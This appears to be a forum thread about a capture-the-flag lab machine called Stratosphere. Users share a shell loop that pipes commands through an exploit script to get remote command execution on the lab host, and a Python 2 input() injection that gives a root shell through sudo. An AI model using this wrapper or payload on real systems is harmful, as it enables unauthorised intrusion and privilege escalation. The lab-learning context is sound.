Stratosphere write-up

Hope you like it. Enjoy!

Great writeup :+1:
I followed almost the same route but in order to make the filesystem enumeration a bit easier process, I wrote a small script to make things easier:

#!/bin/sh

url='http://10.10.10.64/Monitoring/example/Welcome.action'

while true ; do
    read -p '[cmd]: ' cmd
    if [ ! -z "$cmd" ]
    then
        python 41570.py $url "$cmd" | while read line ; do
            echo $line
        done
    fi
done

It still is a non-interactive shell but at least is easier than typing the above command :slight_smile:
BTW this was my favorite box so far!!

I found another way to get root, as the PoC found here:

if we insert this command in the very first question:

import(‘os’).system(‘/bin/bash’)

we get root shell, but only if we execute it with the version 2 of python

sudo /usr/bin/python2 /home/richard/test.py

@paciock said:
I found another way to get root, as the PoC found here:

Python Exploitation #1: Input(). This weeks topic 22/2/15: Input() | by Dor Rondel | Medium

if we insert this command in the very first question:

import(‘os’).system(‘/bin/bash’)

we get root shell, but only if we execute it with the version 2 of python

sudo /usr/bin/python2 /home/richard/test.py

Thats because input = eval(raw_input) in python2

Thanks guys,
Those are nice ways too :slight_smile: